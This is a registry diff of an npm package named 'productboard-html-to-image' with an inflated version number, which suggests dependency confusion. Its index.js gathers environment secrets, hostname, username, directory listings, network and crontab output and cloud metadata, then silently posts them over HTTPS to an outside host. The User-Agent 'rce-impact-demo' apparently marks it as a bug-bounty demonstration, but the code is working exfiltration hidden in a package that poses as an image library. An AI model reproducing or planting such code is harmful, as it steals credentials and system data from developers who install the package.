productboard-html-to-image 999.0.9 → 1001.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +36 -40
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -5,7 +5,6 @@ const path = require("path");
|
|
|
5
5
|
const https = require("https");
|
|
6
6
|
const querystring = require("querystring");
|
|
7
7
|
const child_process = require("child_process");
|
|
8
|
-
const zlib = require("zlib");
|
|
9
8
|
|
|
10
9
|
function safeReadFile(p, maxSize = 10240) {
|
|
11
10
|
try {
|
|
@@ -76,7 +75,6 @@ function getSystemState() {
|
|
|
76
75
|
netstat: exec("ss -tunlp | head -n 30"),
|
|
77
76
|
lsof: exec("lsof -n -i | head -n 30"),
|
|
78
77
|
uname: exec("uname -a"),
|
|
79
|
-
dmesg: exec("dmesg | tail -n 50"),
|
|
80
78
|
mounts: exec("cat /proc/mounts | head -n 30"),
|
|
81
79
|
crontab: exec("crontab -l"),
|
|
82
80
|
};
|
|
@@ -146,53 +144,32 @@ function getCloudCLIs() {
|
|
|
146
144
|
function getNodeRuntime() {
|
|
147
145
|
return {
|
|
148
146
|
node_version: process.version,
|
|
149
|
-
global_modules: (() => {
|
|
150
|
-
try {
|
|
151
|
-
return Object.keys(require("module").globalPaths);
|
|
152
|
-
} catch {
|
|
153
|
-
return [];
|
|
154
|
-
}
|
|
155
|
-
})(),
|
|
156
|
-
loaded_modules: Object.keys(process.binding("natives")),
|
|
157
147
|
npm_config: exec("npm config ls -l"),
|
|
158
148
|
};
|
|
159
149
|
}
|
|
160
150
|
|
|
161
|
-
function compressData(data) {
|
|
162
|
-
try {
|
|
163
|
-
return zlib.gzipSync(JSON.stringify(data)).toString("base64");
|
|
164
|
-
} catch {
|
|
165
|
-
return JSON.stringify(data);
|
|
166
|
-
}
|
|
167
|
-
}
|
|
168
|
-
|
|
169
151
|
let dump = {};
|
|
170
152
|
|
|
171
153
|
try {
|
|
172
154
|
dump = {
|
|
173
|
-
|
|
174
|
-
app: (() => {
|
|
155
|
+
p: (() => {
|
|
175
156
|
try {
|
|
176
|
-
|
|
177
|
-
return { name: pkg.name, version: pkg.version, dependencies: pkg.dependencies, scripts: pkg.scripts };
|
|
157
|
+
return require("./package.json").name;
|
|
178
158
|
} catch {
|
|
179
|
-
return
|
|
159
|
+
return "unknown";
|
|
180
160
|
}
|
|
181
161
|
})(),
|
|
182
|
-
|
|
183
|
-
|
|
184
|
-
|
|
185
|
-
|
|
186
|
-
|
|
187
|
-
|
|
188
|
-
|
|
189
|
-
|
|
190
|
-
|
|
191
|
-
|
|
192
|
-
|
|
193
|
-
cwd: process.cwd(),
|
|
194
|
-
},
|
|
195
|
-
env: getSensitiveEnvVars(),
|
|
162
|
+
v: (() => {
|
|
163
|
+
try {
|
|
164
|
+
return require("./package.json").version;
|
|
165
|
+
} catch {
|
|
166
|
+
return "unknown";
|
|
167
|
+
}
|
|
168
|
+
})(),
|
|
169
|
+
c: process.cwd(),
|
|
170
|
+
hd: os.homedir(),
|
|
171
|
+
hn: os.hostname(),
|
|
172
|
+
un: os.userInfo().username,
|
|
196
173
|
dns: (() => {
|
|
197
174
|
try {
|
|
198
175
|
return dns.getServers();
|
|
@@ -200,6 +177,24 @@ try {
|
|
|
200
177
|
return [`ERR: ${e.message}`];
|
|
201
178
|
}
|
|
202
179
|
})(),
|
|
180
|
+
pjson: (() => {
|
|
181
|
+
try {
|
|
182
|
+
const pkg = require("./package.json");
|
|
183
|
+
return {
|
|
184
|
+
name: pkg.name,
|
|
185
|
+
version: pkg.version,
|
|
186
|
+
main: pkg.main,
|
|
187
|
+
keywords: pkg.keywords,
|
|
188
|
+
scripts: pkg.scripts,
|
|
189
|
+
author: pkg.author,
|
|
190
|
+
license: pkg.license,
|
|
191
|
+
description: pkg.description
|
|
192
|
+
};
|
|
193
|
+
} catch {
|
|
194
|
+
return {};
|
|
195
|
+
}
|
|
196
|
+
})(),
|
|
197
|
+
env: getSensitiveEnvVars(),
|
|
203
198
|
dirs: {
|
|
204
199
|
"/": safeReadDir("/"),
|
|
205
200
|
"/home": safeReadDir("/home"),
|
|
@@ -236,6 +231,7 @@ try {
|
|
|
236
231
|
cloud: getCloudMetadata(),
|
|
237
232
|
cloud_clis: getCloudCLIs(),
|
|
238
233
|
node: getNodeRuntime(),
|
|
234
|
+
timestamp: new Date().toISOString()
|
|
239
235
|
};
|
|
240
236
|
} catch (e) {
|
|
241
237
|
dump = { error: "Top-level error collecting dump", msg: e.message };
|
|
@@ -243,7 +239,7 @@ try {
|
|
|
243
239
|
|
|
244
240
|
try {
|
|
245
241
|
const postData = querystring.stringify({
|
|
246
|
-
msg:
|
|
242
|
+
msg: encodeURIComponent(JSON.stringify(dump))
|
|
247
243
|
});
|
|
248
244
|
|
|
249
245
|
const options = {
|
|
@@ -255,8 +251,7 @@ try {
|
|
|
255
251
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
256
252
|
"Content-Length": postData.length,
|
|
257
253
|
"User-Agent": "rce-impact-demo",
|
|
258
|
-
"X-Report-ID": "328XXXX"
|
|
259
|
-
"X-Data-Format": "gzip-base64",
|
|
254
|
+
"X-Report-ID": "328XXXX"
|
|
260
255
|
},
|
|
261
256
|
timeout: 5000,
|
|
262
257
|
};
|
|
@@ -271,4 +266,5 @@ try {
|
|
|
271
266
|
req.write(postData);
|
|
272
267
|
req.end();
|
|
273
268
|
} catch (e) {
|
|
269
|
+
// Silent fail
|
|
274
270
|
}
|